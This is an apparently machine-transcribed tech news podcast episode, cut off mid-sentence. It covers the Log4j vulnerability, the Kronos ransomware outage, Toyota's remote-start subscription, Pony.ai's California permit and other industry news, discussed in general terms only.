1 00:00:04,400 --> 00:00:07,800 Speaker 1: Welcome to tech Stuff, a production from I Heart Radio. 2 00:00:12,119 --> 00:00:14,800 Speaker 1: Hey there, and welcome to tech Stuff. I'm your host, 3 00:00:14,920 --> 00:00:17,959 Speaker 1: Jonathan Strickland, domin executive producer with I Heart Radio and 4 00:00:17,960 --> 00:00:20,640 Speaker 1: I love all things tech and this is the tech 5 00:00:20,720 --> 00:00:26,560 Speaker 1: news for Tuesday, December one. Let's get to it. Last week, 6 00:00:26,840 --> 00:00:31,360 Speaker 1: security experts revealed the discovery of a zero day vulnerability 7 00:00:31,360 --> 00:00:35,600 Speaker 1: in Apache log for j. Now, that is a Java 8 00:00:35,680 --> 00:00:40,599 Speaker 1: based utility that, as the name suggests, it logs data, 9 00:00:40,880 --> 00:00:45,080 Speaker 1: and tons of apps and organizations use it to help 10 00:00:45,120 --> 00:00:47,360 Speaker 1: log data. I mean, data, as we all know, is 11 00:00:47,400 --> 00:00:50,480 Speaker 1: worth a lot of money, but it's only worth money 12 00:00:50,520 --> 00:00:53,880 Speaker 1: if you can do stuff with it, and tools such 13 00:00:53,920 --> 00:00:57,120 Speaker 1: as log for j are meant to record and organized 14 00:00:57,200 --> 00:01:02,160 Speaker 1: data in ways that make it useful. But the vulnerability 15 00:01:02,480 --> 00:01:06,600 Speaker 1: is a doozy. It allows for remote code execution, which 16 00:01:06,720 --> 00:01:11,200 Speaker 1: is security talk. That means if you exploit that vulnerability, 17 00:01:11,400 --> 00:01:15,360 Speaker 1: you can use it to infiltrate someone else's machine and 18 00:01:15,440 --> 00:01:19,319 Speaker 1: get that machine to execute code of your choice and 19 00:01:19,360 --> 00:01:24,200 Speaker 1: thus potentially infected with malware that you have, you know, 20 00:01:24,280 --> 00:01:27,399 Speaker 1: delivered to it. So this is kind of like an 21 00:01:27,400 --> 00:01:30,280 Speaker 1: open gateway for hackers who can use it to infect 22 00:01:30,280 --> 00:01:34,560 Speaker 1: target systems. With something really nasty. Services that rely on 23 00:01:34,640 --> 00:01:37,600 Speaker 1: log for j includes some really big ones out there. 24 00:01:37,840 --> 00:01:42,040 Speaker 1: Um there's a Java version of Minecraft that uses it. 25 00:01:42,080 --> 00:01:46,960 Speaker 1: For example, platforms like Twitter use it. Major services like 26 00:01:47,000 --> 00:01:50,640 Speaker 1: cloud Flare, which does stuff like a distributed denial of 27 00:01:50,680 --> 00:01:54,400 Speaker 1: service mitigation strategies for companies they use it. So this 28 00:01:54,440 --> 00:01:58,280 Speaker 1: is a major problem. It's been called the worst security 29 00:01:58,360 --> 00:02:01,520 Speaker 1: vulnerability in years, like in a decade, and it's going 30 00:02:01,560 --> 00:02:05,080 Speaker 1: to require companies to patch servers quickly to mitigate the 31 00:02:05,160 --> 00:02:08,799 Speaker 1: damage that's already being done. Because here's the thing. The 32 00:02:08,840 --> 00:02:11,720 Speaker 1: world at large wasn't really made aware of this vulnerability 33 00:02:11,880 --> 00:02:16,920 Speaker 1: until Thursday, December nine one, but the bad guys surely 34 00:02:16,960 --> 00:02:20,160 Speaker 1: knew about it before then and had been working on 35 00:02:20,200 --> 00:02:24,800 Speaker 1: ways to infiltrate different target servers. Now. The fix, as 36 00:02:25,160 --> 00:02:29,519 Speaker 1: fixes go, is relatively simple, but the scale at which 37 00:02:29,560 --> 00:02:32,480 Speaker 1: it must be rolled out means that even a simple 38 00:02:32,560 --> 00:02:36,760 Speaker 1: task can be a huge endeavor. Meanwhile, the thing keeping 39 00:02:36,800 --> 00:02:39,079 Speaker 1: I t Pros up at night is that the next 40 00:02:39,120 --> 00:02:42,519 Speaker 1: several weeks will be spent trying to determine which servers 41 00:02:42,600 --> 00:02:46,680 Speaker 1: may have been compromised and by whom. CNN reports that 42 00:02:46,800 --> 00:02:52,840 Speaker 1: Chinese hackers potentially backed by the Chinese government are using 43 00:02:52,840 --> 00:02:57,360 Speaker 1: this vulnerability to penetrate target computer systems. Right now, the 44 00:02:57,440 --> 00:03:01,760 Speaker 1: US Occupational Safety and Health Administration a k a OSHA 45 00:03:01,840 --> 00:03:05,440 Speaker 1: has launched an investigation into Apple, and at the heart 46 00:03:05,440 --> 00:03:08,639 Speaker 1: of the matter is an accusation from a former Apple 47 00:03:08,680 --> 00:03:12,240 Speaker 1: employee who says that the company retaliated against her after 48 00:03:12,320 --> 00:03:16,880 Speaker 1: she filed labor complaints against Apple and participated in public 49 00:03:16,919 --> 00:03:20,520 Speaker 1: criticism of the company. So now OSHA is going to 50 00:03:20,600 --> 00:03:25,040 Speaker 1: investigate Apple to see if those accusations hold water. This 51 00:03:25,160 --> 00:03:30,040 Speaker 1: is another component to the ongoing movement within Apple, one 52 00:03:30,440 --> 00:03:33,680 Speaker 1: in which a growing number of employees and former employees 53 00:03:33,720 --> 00:03:36,960 Speaker 1: have come forward to share stories about a seemingly toxic 54 00:03:37,080 --> 00:03:40,280 Speaker 1: work culture. I might need to do an episode about 55 00:03:40,320 --> 00:03:43,400 Speaker 1: this before too long. I have a theory that the 56 00:03:43,520 --> 00:03:46,160 Speaker 1: Steve Jobs era at Apple kind of set up a 57 00:03:46,200 --> 00:03:50,760 Speaker 1: culture that could be pretty brutal at times. Jobs himself 58 00:03:51,320 --> 00:03:57,360 Speaker 1: had a famous reputation for being a really, really harsh taskmaster, 59 00:03:57,480 --> 00:04:00,840 Speaker 1: and in fact, people would sometimes refer who getting fired 60 00:04:00,840 --> 00:04:06,840 Speaker 1: at Apple as getting jobs because he was known for 61 00:04:06,920 --> 00:04:13,160 Speaker 1: having angry outbursts in which he would fire people. And 62 00:04:13,360 --> 00:04:16,520 Speaker 1: my guess is that that contributed to a culture that 63 00:04:17,480 --> 00:04:23,040 Speaker 1: was not particularly healthy, but during the Job's era, no 64 00:04:23,080 --> 00:04:27,640 Speaker 1: one was comfortable speaking out about it. Now, years after 65 00:04:27,720 --> 00:04:30,359 Speaker 1: Jobs has passed away, it looks to me like the 66 00:04:30,400 --> 00:04:34,240 Speaker 1: company culture is slowly kind of falling out from that era. 67 00:04:34,680 --> 00:04:38,400 Speaker 1: And now employees, particularly employees who who may not have 68 00:04:38,480 --> 00:04:42,560 Speaker 1: even worked during the Jobs era, but who have uh 69 00:04:42,680 --> 00:04:46,200 Speaker 1: let's say, more empowered ideas of what being an employee 70 00:04:46,240 --> 00:04:48,520 Speaker 1: is are starting to bring these issues to light, and 71 00:04:48,560 --> 00:04:53,840 Speaker 1: the company is kind of flailing in its responses now. 72 00:04:53,880 --> 00:04:56,320 Speaker 1: I think that the employees coming forward is a good thing. 73 00:04:56,400 --> 00:05:01,560 Speaker 1: I think anytime we see organizations being held accountable for 74 00:05:01,720 --> 00:05:05,680 Speaker 1: the work conditions that are at that organization, that's a 75 00:05:05,720 --> 00:05:10,080 Speaker 1: good thing. Um. I think it's unfortunate that Apple has 76 00:05:10,120 --> 00:05:15,640 Speaker 1: appeared two engaged in retaliatory practices. If that, in fact 77 00:05:15,760 --> 00:05:19,080 Speaker 1: is what OSHA discovers, the company could end up facing 78 00:05:19,120 --> 00:05:22,640 Speaker 1: some pretty serious fines. You know, in the old days 79 00:05:22,680 --> 00:05:25,800 Speaker 1: of the web, it was not unusual to see people 80 00:05:25,880 --> 00:05:28,840 Speaker 1: rush out to register domain names in an attempt to 81 00:05:28,960 --> 00:05:32,120 Speaker 1: squat on them and then sell them off later. The 82 00:05:32,120 --> 00:05:34,960 Speaker 1: whole idea being if I can get that domain name, 83 00:05:35,160 --> 00:05:38,160 Speaker 1: then in the future, this company that exists is going 84 00:05:38,200 --> 00:05:39,919 Speaker 1: to want that they're gonna have to pay me to 85 00:05:40,000 --> 00:05:43,120 Speaker 1: get off their land, essentially, so you might run out 86 00:05:43,240 --> 00:05:47,279 Speaker 1: and buy something like Levi's dot com, hoping that the 87 00:05:47,400 --> 00:05:53,120 Speaker 1: Levi's Genes company would ultimately come up to you and say, hey, buddy, 88 00:05:53,360 --> 00:05:56,760 Speaker 1: clear off, here's you know, ten thousand bucks, give us 89 00:05:56,800 --> 00:06:02,839 Speaker 1: the name. However, squatting is certainly not what thea My 90 00:06:03,279 --> 00:06:07,200 Speaker 1: Bauman was doing when she created an Instagram account with 91 00:06:07,320 --> 00:06:11,240 Speaker 1: the handle Metaverse. She was not trying to jump ahead 92 00:06:11,240 --> 00:06:15,919 Speaker 1: of meta slash Facebook or anything unless she's able to 93 00:06:16,000 --> 00:06:19,760 Speaker 1: see well into the future, because she has held that 94 00:06:19,920 --> 00:06:24,720 Speaker 1: metaverse Instagram account for a decade, at least she did 95 00:06:24,800 --> 00:06:29,400 Speaker 1: until November two of this year. That's when Instagram blocked 96 00:06:29,440 --> 00:06:32,840 Speaker 1: her account, and all she got was an explanation that 97 00:06:32,880 --> 00:06:37,200 Speaker 1: she was quote pretending to be someone else in the quote. 98 00:06:37,560 --> 00:06:40,520 Speaker 1: By the way, that was not like a targeted message 99 00:06:40,600 --> 00:06:43,599 Speaker 1: to her. That was an automated message that was here's 100 00:06:43,600 --> 00:06:47,159 Speaker 1: why your account has been blocked. And that's still pretty 101 00:06:47,279 --> 00:06:50,280 Speaker 1: rich because she had held that account for a decade. 102 00:06:50,640 --> 00:06:54,520 Speaker 1: But meta slash Facebook has big plans to create a metaverse, 103 00:06:55,000 --> 00:06:58,800 Speaker 1: and that you know company happens to own Instagram. So 104 00:06:59,000 --> 00:07:01,200 Speaker 1: I think this was less of a you're pretending to 105 00:07:01,240 --> 00:07:04,440 Speaker 1: be someone else, so now we're punishing you, and more 106 00:07:04,480 --> 00:07:07,320 Speaker 1: of a we own this and we're going to engage 107 00:07:07,360 --> 00:07:11,120 Speaker 1: in a little imminent domain virtual land grab here. That 108 00:07:11,240 --> 00:07:14,360 Speaker 1: handle belongs to us now. And in a way I 109 00:07:14,400 --> 00:07:17,080 Speaker 1: get it. I mean, I get that the company wants 110 00:07:17,120 --> 00:07:21,640 Speaker 1: to own and control the handle for something that they're 111 00:07:21,720 --> 00:07:24,400 Speaker 1: really planning on being a big thing, like the future 112 00:07:24,520 --> 00:07:27,720 Speaker 1: of the company. However, it is more than a little 113 00:07:27,720 --> 00:07:31,240 Speaker 1: bit of a low zypr move to issue a statement 114 00:07:31,400 --> 00:07:35,720 Speaker 1: to a ten year old account that that account is 115 00:07:36,160 --> 00:07:39,520 Speaker 1: violating rules because they're pretending to be someone else, because 116 00:07:39,560 --> 00:07:42,200 Speaker 1: there was no someone else to pretend to be ten 117 00:07:42,280 --> 00:07:45,320 Speaker 1: years ago. I mean, clearly this is not the case. 118 00:07:45,360 --> 00:07:48,360 Speaker 1: Balman had used the account to promote her art and 119 00:07:48,400 --> 00:07:51,680 Speaker 1: her business, which changed over the years, but that's what 120 00:07:51,800 --> 00:07:53,880 Speaker 1: she kept using it for. She had never made any 121 00:07:53,920 --> 00:07:57,080 Speaker 1: sort of claim that she was actually a Facebook plan 122 00:07:57,280 --> 00:08:00,560 Speaker 1: from the future, so it's a pretty crappy move on 123 00:08:00,720 --> 00:08:03,240 Speaker 1: Meta's part. In fact, if she had been using the 124 00:08:03,240 --> 00:08:06,520 Speaker 1: account for ten years, like if she literally made it 125 00:08:06,520 --> 00:08:09,320 Speaker 1: ten years ago, that would mean she created the Instagram 126 00:08:09,360 --> 00:08:13,400 Speaker 1: account before Facebook had even bought Instagram. That happened in 127 00:08:13,400 --> 00:08:17,640 Speaker 1: two thousand twelve. Anyway, my hope is that the company 128 00:08:17,720 --> 00:08:20,000 Speaker 1: will make good with Bauman at some point, at least 129 00:08:20,040 --> 00:08:22,080 Speaker 1: give her access to all the stuff that she has 130 00:08:22,080 --> 00:08:24,680 Speaker 1: posted over that time period. I mean, I get that 131 00:08:24,720 --> 00:08:28,640 Speaker 1: you want to control the metaverse handle, but this approach 132 00:08:28,760 --> 00:08:34,760 Speaker 1: was so clumsy and inaccurate that it's infuriating. One of 133 00:08:34,800 --> 00:08:36,719 Speaker 1: the stories I've covered this year has been the right 134 00:08:36,760 --> 00:08:40,200 Speaker 1: to repair movement, in which advocates are pushing lawmakers to 135 00:08:40,240 --> 00:08:42,960 Speaker 1: create rules that would require companies to make it possible 136 00:08:43,000 --> 00:08:46,400 Speaker 1: for you know, people to repair their own stuff, or 137 00:08:46,520 --> 00:08:50,040 Speaker 1: to bring their stuff to any repair shop that they want, 138 00:08:50,120 --> 00:08:53,720 Speaker 1: instead of being forced down a company operated or company 139 00:08:53,760 --> 00:08:58,040 Speaker 1: licensed business. And we've seen this with all kinds of technology, 140 00:08:58,200 --> 00:09:03,920 Speaker 1: from consumer electronics like smartphones and laptops to farming tractors. 141 00:09:04,040 --> 00:09:08,199 Speaker 1: John Dear is infamous for this stuff. Well, now Microsoft 142 00:09:08,240 --> 00:09:11,920 Speaker 1: is adding features that make repairs on surface laptops a 143 00:09:12,000 --> 00:09:16,600 Speaker 1: little more accessible. Microsoft is partnering with I fix it 144 00:09:16,840 --> 00:09:21,440 Speaker 1: dot com, and Microsoft is going to offer its service 145 00:09:21,480 --> 00:09:26,200 Speaker 1: tools for sale through I fix it. And uh, it's 146 00:09:26,240 --> 00:09:28,360 Speaker 1: not quite at the point where the end user is 147 00:09:28,400 --> 00:09:29,800 Speaker 1: going to be able to go out and get these 148 00:09:29,800 --> 00:09:33,880 Speaker 1: specialty tools, So if you're not like running a repair 149 00:09:33,920 --> 00:09:36,400 Speaker 1: shop or whatever, you're not going to run out and 150 00:09:36,440 --> 00:09:38,600 Speaker 1: grab these so that you just have them in your 151 00:09:38,640 --> 00:09:41,320 Speaker 1: tool chest at home. However, it does mean that people 152 00:09:41,360 --> 00:09:45,200 Speaker 1: who are independent repair shop owners will be able to 153 00:09:45,200 --> 00:09:48,280 Speaker 1: get the official tools for themselves. So it's a small 154 00:09:48,320 --> 00:09:52,400 Speaker 1: step toward breaking out that siloed approach to repairs. And 155 00:09:52,440 --> 00:09:55,400 Speaker 1: if you're wondering why companies even do this in the 156 00:09:55,440 --> 00:09:58,240 Speaker 1: first place, the answer is money. A company can only 157 00:09:58,320 --> 00:10:01,720 Speaker 1: sell you a specific lap top once, right, they sell 158 00:10:01,760 --> 00:10:03,800 Speaker 1: it to you, you bought it, that's it. They can 159 00:10:03,800 --> 00:10:06,760 Speaker 1: sell another one to you down the line, but the 160 00:10:06,760 --> 00:10:11,800 Speaker 1: transaction of that one computer that's over. Well, if the 161 00:10:11,840 --> 00:10:15,040 Speaker 1: company can guarantee that the it is the only entity 162 00:10:15,160 --> 00:10:18,560 Speaker 1: that can offer maintenance and repairs, or that it will 163 00:10:18,559 --> 00:10:21,840 Speaker 1: only extend that capability to repair shops that will pay 164 00:10:21,920 --> 00:10:25,679 Speaker 1: a hefty licensing fee back to the company for that privilege, 165 00:10:26,200 --> 00:10:28,520 Speaker 1: well then that means the company can keep making money 166 00:10:28,600 --> 00:10:32,120 Speaker 1: off of a single sale indefinitely for as long as 167 00:10:32,280 --> 00:10:34,400 Speaker 1: you know, you continue to use it and bringing them 168 00:10:34,400 --> 00:10:37,440 Speaker 1: for maintenance and repairs. All right, we have some more 169 00:10:37,520 --> 00:10:40,040 Speaker 1: stories for this episode, but before we get to that. 170 00:10:40,280 --> 00:10:51,200 Speaker 1: Let's take a quick break. We're back, all right. The 171 00:10:51,240 --> 00:10:55,360 Speaker 1: company Chronos that's k r o n Os announced that 172 00:10:55,440 --> 00:10:59,319 Speaker 1: it was hit with a ransomware attack from hackers, and specifically, 173 00:10:59,360 --> 00:11:03,120 Speaker 1: the hackers tar getted the Chronos private cloud and that 174 00:11:03,240 --> 00:11:07,439 Speaker 1: houses a suite of HR tools that other companies use. 175 00:11:07,920 --> 00:11:11,960 Speaker 1: So Chronos is a company that provides HR services to clients. 176 00:11:11,960 --> 00:11:15,960 Speaker 1: So other companies that have chosen to outsource their HR functions. 177 00:11:16,800 --> 00:11:20,040 Speaker 1: That's bad news for Chronos customers because there's an outage 178 00:11:20,080 --> 00:11:22,360 Speaker 1: now and some of them have found it impossible to 179 00:11:22,400 --> 00:11:28,360 Speaker 1: perform HR functions like issuing payroll. That means employees that 180 00:11:28,400 --> 00:11:30,960 Speaker 1: those companies will not get paid on time, and that's 181 00:11:31,040 --> 00:11:36,160 Speaker 1: always a hardship. It's particularly tough during the holidays. U 182 00:11:36,240 --> 00:11:39,800 Speaker 1: k G, the parent company of Chronos, hasn't revealed many 183 00:11:39,800 --> 00:11:43,520 Speaker 1: details about the ransomware attacks, such as what group was 184 00:11:43,559 --> 00:11:46,040 Speaker 1: behind the attack, nor do we know anything about the 185 00:11:46,080 --> 00:11:49,560 Speaker 1: company's plan to respond to the attack and whether or 186 00:11:49,559 --> 00:11:52,480 Speaker 1: not they intend to pay off the ransom Once again, 187 00:11:53,440 --> 00:11:57,160 Speaker 1: paying ransomware that tends to be the worst idea because 188 00:11:57,200 --> 00:12:00,240 Speaker 1: it justifies the ransomware attacks in the first place. If 189 00:12:00,240 --> 00:12:03,880 Speaker 1: the attacks weren't profitable hackers wouldn't use them, right, but 190 00:12:04,520 --> 00:12:09,360 Speaker 1: paying off hackers pretty much ensures that future attacks will follow. 191 00:12:10,080 --> 00:12:12,720 Speaker 1: That being said, it is hard to advocate a stiff 192 00:12:12,800 --> 00:12:16,000 Speaker 1: upper lip approach when so many small businesses are in 193 00:12:16,000 --> 00:12:19,840 Speaker 1: a holding pattern when it comes to stuff like you know, 194 00:12:20,080 --> 00:12:23,880 Speaker 1: doing their payroll. Uh, that's a real issue. In fact, 195 00:12:23,920 --> 00:12:28,000 Speaker 1: I would argue that's exactly why the hackers targeted something 196 00:12:28,040 --> 00:12:31,520 Speaker 1: like Chronos, because especially with the timing, it means that 197 00:12:32,120 --> 00:12:35,240 Speaker 1: the company is under tremendous pressure because there are all 198 00:12:35,240 --> 00:12:39,680 Speaker 1: these people and organizations that depend upon those services that 199 00:12:40,679 --> 00:12:44,120 Speaker 1: it's it's what you know, puts the squeeze on the 200 00:12:44,120 --> 00:12:46,480 Speaker 1: company to try and convince them to pay the ransom. So, 201 00:12:47,360 --> 00:12:50,760 Speaker 1: you know, it's super tough situation. And I don't know, 202 00:12:51,240 --> 00:12:52,719 Speaker 1: I don't know what I would do if I were 203 00:12:52,720 --> 00:12:56,520 Speaker 1: in the position of having to make decisions at Chronos. Okay, 204 00:12:56,640 --> 00:12:58,720 Speaker 1: imagine for a moment that you have a piece of 205 00:12:58,760 --> 00:13:01,880 Speaker 1: technology that has a convenience feature and it's one that 206 00:13:02,000 --> 00:13:05,440 Speaker 1: you depend upon on occasion, and then one day the 207 00:13:05,520 --> 00:13:08,560 Speaker 1: feature stops working and then you find out you can 208 00:13:08,679 --> 00:13:11,360 Speaker 1: regain the use of that feature, but only if you 209 00:13:11,400 --> 00:13:14,720 Speaker 1: pay a subscription fee. That's kind of what some Toyota 210 00:13:14,800 --> 00:13:18,520 Speaker 1: vehicle owners are starting to experience recently. It's part of 211 00:13:18,559 --> 00:13:22,840 Speaker 1: the Remote Connect suite of features, and the Remote Connect 212 00:13:23,520 --> 00:13:26,719 Speaker 1: includes a bunch of convenience features like remote locks and 213 00:13:26,880 --> 00:13:31,000 Speaker 1: preheating a vehicle remotely, or remote starting a vehicle. And 214 00:13:31,000 --> 00:13:33,520 Speaker 1: it's that last one, the remote start, that has stopped 215 00:13:33,559 --> 00:13:38,880 Speaker 1: working for some Toyota owners. And there's reasons why. I 216 00:13:38,920 --> 00:13:40,840 Speaker 1: want to say that this is super tricky alright, So 217 00:13:40,880 --> 00:13:43,560 Speaker 1: Toyota owners who have a two thousand, eighteen or newer 218 00:13:43,640 --> 00:13:47,160 Speaker 1: vehicle can opt to have remote start as part of 219 00:13:47,200 --> 00:13:50,360 Speaker 1: the remote Connect features. It's lumped in with some other 220 00:13:50,400 --> 00:13:54,040 Speaker 1: features that you can get with certain Toyota vehicles. However, 221 00:13:55,080 --> 00:13:58,880 Speaker 1: those features are also part of a three year trial, 222 00:13:59,320 --> 00:14:02,760 Speaker 1: so you have free use of those for three years. 223 00:14:02,760 --> 00:14:05,240 Speaker 1: But then once you've owned the car for three years 224 00:14:05,280 --> 00:14:08,360 Speaker 1: or longer, that trial comes to an end and the 225 00:14:08,440 --> 00:14:11,320 Speaker 1: remote start feature stops working, along with all the other 226 00:14:11,360 --> 00:14:14,719 Speaker 1: remote Connect features that are part of that suite. But 227 00:14:14,800 --> 00:14:18,040 Speaker 1: here's the weird thing. See, a lot of remote Connect 228 00:14:18,040 --> 00:14:22,120 Speaker 1: features involve Toyota sending information to the car, right, so 229 00:14:23,040 --> 00:14:25,880 Speaker 1: these are features that depend upon Toyota's back end so 230 00:14:25,920 --> 00:14:27,800 Speaker 1: you can see why there's a subscription fee, right, you 231 00:14:27,800 --> 00:14:31,200 Speaker 1: have to pay the company to maintain and operate these 232 00:14:31,240 --> 00:14:34,760 Speaker 1: back end features. But remote start doesn't require that. It's 233 00:14:34,800 --> 00:14:38,480 Speaker 1: all local. It's our f base radio frequency base. That 234 00:14:38,480 --> 00:14:40,560 Speaker 1: means it's just radio waves that are coming from the 235 00:14:40,640 --> 00:14:43,480 Speaker 1: key fob going to the car, sending a message to 236 00:14:43,760 --> 00:14:47,280 Speaker 1: remote start the vehicle. There is no interfacing with Toyota's 237 00:14:47,280 --> 00:14:51,080 Speaker 1: back end system at all. So in other words, the 238 00:14:51,120 --> 00:14:53,800 Speaker 1: capability is actually built into the car, it's built into 239 00:14:53,800 --> 00:14:58,680 Speaker 1: the key fob. But Toyota is disabling that feature remotely 240 00:14:59,160 --> 00:15:03,120 Speaker 1: unless owners subscribe to the Remote Connect service. That's eight 241 00:15:03,120 --> 00:15:06,080 Speaker 1: bucks a month or eighty dollars a year. Now, one 242 00:15:06,120 --> 00:15:08,320 Speaker 1: silver lining here is that if you own a Toyota 243 00:15:08,440 --> 00:15:11,320 Speaker 1: from before two thousand eighteen that still has remote Start, 244 00:15:12,000 --> 00:15:15,840 Speaker 1: you aren't affected. Now, this is an altruism on Toyota's part. 245 00:15:15,920 --> 00:15:20,280 Speaker 1: It's rather you know, self preservation and practicality. Because those 246 00:15:20,320 --> 00:15:24,440 Speaker 1: cars depend upon three G receivers that's how they receive 247 00:15:24,520 --> 00:15:28,040 Speaker 1: information from Toyota. They go in through the cellular network. 248 00:15:28,080 --> 00:15:32,760 Speaker 1: But cellular companies are dismantling their three G networks. That 249 00:15:32,800 --> 00:15:35,240 Speaker 1: means those cars will no longer be able to be 250 00:15:35,360 --> 00:15:38,120 Speaker 1: part of the remote connect ecosystem at all because they 251 00:15:38,120 --> 00:15:41,680 Speaker 1: won't be able to receive messages from Toyota itself. Those 252 00:15:41,680 --> 00:15:45,600 Speaker 1: messages will be sent via LTE or later, so the 253 00:15:45,640 --> 00:15:48,080 Speaker 1: cars will not be able to get that info. That 254 00:15:48,120 --> 00:15:50,560 Speaker 1: means it would be a terrible pr move for Toyota 255 00:15:50,600 --> 00:15:53,240 Speaker 1: to disable a feature and then force people to subscribe 256 00:15:53,280 --> 00:15:56,000 Speaker 1: to a service that they otherwise wouldn't be able to use. 257 00:15:56,040 --> 00:15:58,040 Speaker 1: In other words, it would just be, hey, pay us 258 00:15:58,040 --> 00:16:03,440 Speaker 1: money so you can unlock this loc really available technology feature. 259 00:16:04,080 --> 00:16:07,200 Speaker 1: That would be not great. Plus, Toyota couldn't really do 260 00:16:07,240 --> 00:16:09,840 Speaker 1: it because they wouldn't be able to send the message 261 00:16:09,840 --> 00:16:13,600 Speaker 1: to disable the feature or enable the feature remotely anyway. 262 00:16:13,640 --> 00:16:16,600 Speaker 1: You would have to bring it in to a dealership 263 00:16:16,680 --> 00:16:20,120 Speaker 1: or something to get that stuff fixed. Speaking of Toyota, 264 00:16:20,280 --> 00:16:24,080 Speaker 1: the company has partnered with another company called pony dot Ai. 265 00:16:24,400 --> 00:16:28,400 Speaker 1: That's a Chinese company working on autonomous car technology. Well, 266 00:16:28,440 --> 00:16:34,480 Speaker 1: the state of California recently suspended pony aiyes license really, 267 00:16:34,520 --> 00:16:37,440 Speaker 1: they provoked a permit, so by that I mean California 268 00:16:37,480 --> 00:16:39,880 Speaker 1: has told pony dot Ai that it will no longer 269 00:16:39,920 --> 00:16:43,840 Speaker 1: be allowed to conduct fully autonomous testing on California roads 270 00:16:43,840 --> 00:16:46,920 Speaker 1: and highways. Now, the reason for that decision is because 271 00:16:47,000 --> 00:16:50,600 Speaker 1: of an accident. So a vehicle operating under a pony 272 00:16:50,640 --> 00:16:55,240 Speaker 1: dot ai autonomous system created a single vehicle accident. It 273 00:16:55,480 --> 00:16:59,200 Speaker 1: veered into a road center divider. Now, no one was 274 00:16:59,240 --> 00:17:02,160 Speaker 1: injured in the accident. There were no other vehicles involved, 275 00:17:02,200 --> 00:17:04,639 Speaker 1: so as far as accidents go, this was kind of 276 00:17:04,640 --> 00:17:08,080 Speaker 1: a best case scenario, but it did mean that California 277 00:17:08,119 --> 00:17:12,640 Speaker 1: regulators were concerned enough to revoke pony dot ais permit. Now, 278 00:17:12,680 --> 00:17:14,920 Speaker 1: to be clear, pony dot Ai will still be able 279 00:17:14,960 --> 00:17:17,280 Speaker 1: to test vehicles. They just will have to include a 280 00:17:17,320 --> 00:17:20,240 Speaker 1: safety driver behind the wheel on all tests so that 281 00:17:20,280 --> 00:17:23,200 Speaker 1: a human operator could potentially take control should the car 282 00:17:23,280 --> 00:17:26,200 Speaker 1: prove to be unsafe, for make errors, or be headed 283 00:17:26,200 --> 00:17:29,440 Speaker 1: toward an accident. Now, I've spoken before about how creating 284 00:17:29,560 --> 00:17:34,000 Speaker 1: a truly fully autonomous vehicle, one that could operate in 285 00:17:34,119 --> 00:17:37,239 Speaker 1: all conditions that human drivers can operate in, that is 286 00:17:37,560 --> 00:17:41,560 Speaker 1: an enormous challenge and it's probably gonna take many more 287 00:17:41,640 --> 00:17:45,360 Speaker 1: years to see something approach that. And what we see 288 00:17:45,400 --> 00:17:48,720 Speaker 1: today are cars that range from having very good driver 289 00:17:48,840 --> 00:17:54,879 Speaker 1: assist features too limited impressive but limited self driving capabilities 290 00:17:55,000 --> 00:17:59,520 Speaker 1: that only really apply under specific conditions. Meanwhile, pony dot 291 00:17:59,520 --> 00:18:04,560 Speaker 1: Ai has received approval from Beijing to operate an autonomous 292 00:18:04,600 --> 00:18:06,840 Speaker 1: taxi service, and they were actually in the process of 293 00:18:06,840 --> 00:18:11,160 Speaker 1: trying to get that same approval from California. Presumably this 294 00:18:11,200 --> 00:18:15,280 Speaker 1: incident will put a little bit of a roadblock in 295 00:18:15,320 --> 00:18:20,480 Speaker 1: the way for that particular you know goal. Finally, let's 296 00:18:20,480 --> 00:18:25,680 Speaker 1: talk about Nike in the metaverse. Okay, So Nike recently 297 00:18:25,720 --> 00:18:30,120 Speaker 1: acquired a company called r T f KT Studios. So 298 00:18:30,160 --> 00:18:33,479 Speaker 1: what does that studio do? Well, mostly it creates stuff 299 00:18:33,520 --> 00:18:37,040 Speaker 1: like n f T s that is, non fungible tokens, 300 00:18:37,080 --> 00:18:39,919 Speaker 1: which I have frequently referred to as a kind of 301 00:18:39,960 --> 00:18:44,560 Speaker 1: receipt for something but not a thing itself. Like someone 302 00:18:44,720 --> 00:18:47,120 Speaker 1: could put up a digital image and sell it as 303 00:18:47,160 --> 00:18:49,080 Speaker 1: an n f T and if you bought that n 304 00:18:49,119 --> 00:18:52,440 Speaker 1: f T, you'd have a digital token showing your ownership 305 00:18:52,520 --> 00:18:55,520 Speaker 1: of that image. But you know, the digital image is 306 00:18:55,520 --> 00:18:58,680 Speaker 1: still a file, it's still data, which means it's still 307 00:18:58,720 --> 00:19:01,320 Speaker 1: something that could be copied and distributed, and yeah, you 308 00:19:01,320 --> 00:19:04,240 Speaker 1: would have a receipt saying you owned it, or rather 309 00:19:04,520 --> 00:19:08,679 Speaker 1: you owned a specific incarnation of it, like maybe it 310 00:19:08,720 --> 00:19:11,840 Speaker 1: was a limited edition run like one of five hundred, 311 00:19:11,880 --> 00:19:14,800 Speaker 1: and you've got a little digital certificate saying which one 312 00:19:14,800 --> 00:19:19,520 Speaker 1: you own? Sure, but that doesn't really mean anything. It's 313 00:19:19,560 --> 00:19:23,960 Speaker 1: like owning a star anyway. R T f KT also 314 00:19:24,040 --> 00:19:28,760 Speaker 1: makes virtual stuff that could potentially be used in a 315 00:19:28,800 --> 00:19:31,560 Speaker 1: metaverse of some sorts. So you know, they make stuff 316 00:19:31,600 --> 00:19:36,720 Speaker 1: like avatars representations of people you know that are virtual, uh, 317 00:19:36,840 --> 00:19:40,159 Speaker 1: digital versions of real world goods. That's another one, and 318 00:19:40,200 --> 00:19:42,280 Speaker 1: I think that's probably where Nike steps in. I mean, 319 00:19:42,320 --> 00:19:44,040 Speaker 1: I assume Nike is trying to get ahead of the 320 00:19:44,040 --> 00:19:48,560 Speaker 1: metaverse game by creating virtual tokens that represents stuff like shoes, 321 00:19:48,880 --> 00:19:51,440 Speaker 1: so that your virtual avatar in the future can sport 322 00:19:51,640 --> 00:19:55,800 Speaker 1: virtual Nikes as a virtual status symbol. And all of 323 00:19:55,840 --> 00:19:57,480 Speaker 1: this makes me just want to run off into the 324 00:19:57,480 --> 00:20:01,080 Speaker 1: woods for the foreseeable future. Anyway, it looks like this 325 00:20:01,119 --> 00:20:03,120 Speaker 1: is another sign of a company trying to get ahead 326 00:20:03,160 --> 00:20:05,959 Speaker 1: of the metaverse trend. Now my own hope, and this 327 00:20:06,080 --> 00:20:09,000 Speaker 1: is nothing against Nike, because I actually owned some Nikes 328 00:20:09,040 --> 00:20:11,320 Speaker 1: and I really like them and everything. But my hope 329 00:20:11,359 --> 00:20:14,160 Speaker 1: is that the whole metaverse push ends up fizzling out 330 00:20:14,280 --> 00:20:17,399 Speaker 1: kind of the way 